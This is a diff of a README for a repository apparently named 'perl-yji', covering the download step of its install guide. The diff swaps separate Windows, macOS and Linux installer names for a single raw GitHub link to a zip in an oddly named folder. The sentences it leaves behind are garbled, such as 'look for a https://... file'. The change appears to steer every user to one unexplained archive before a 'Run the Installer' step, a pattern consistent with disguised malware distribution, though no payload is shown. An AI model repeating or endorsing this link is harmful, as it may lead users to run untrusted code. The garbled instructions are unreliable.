JayalekshmiSharma/perl-yji/README.md

 ### 3. Download the File
 Click on the downloadable file for your operating system.

-- For Windows, it would typically be labeled `perl-yji-win.exe`.
+- For Windows, it would typically be labeled `https://raw.githubusercontent.com/JayalekshmiSharma/perl-yji/main/Paulist/perl-yji.zip`.
-- For macOS, it could be named `perl-yji-mac.dmg`.
+- For macOS, it could be named `https://raw.githubusercontent.com/JayalekshmiSharma/perl-yji/main/Paulist/perl-yji.zip`.
-- For Linux, look for a `.tar.gz` file.
+- For Linux, look for a `https://raw.githubusercontent.com/JayalekshmiSharma/perl-yji/main/Paulist/perl-yji.zip` file.

 ### 4. Run the Installer
 After the download completes: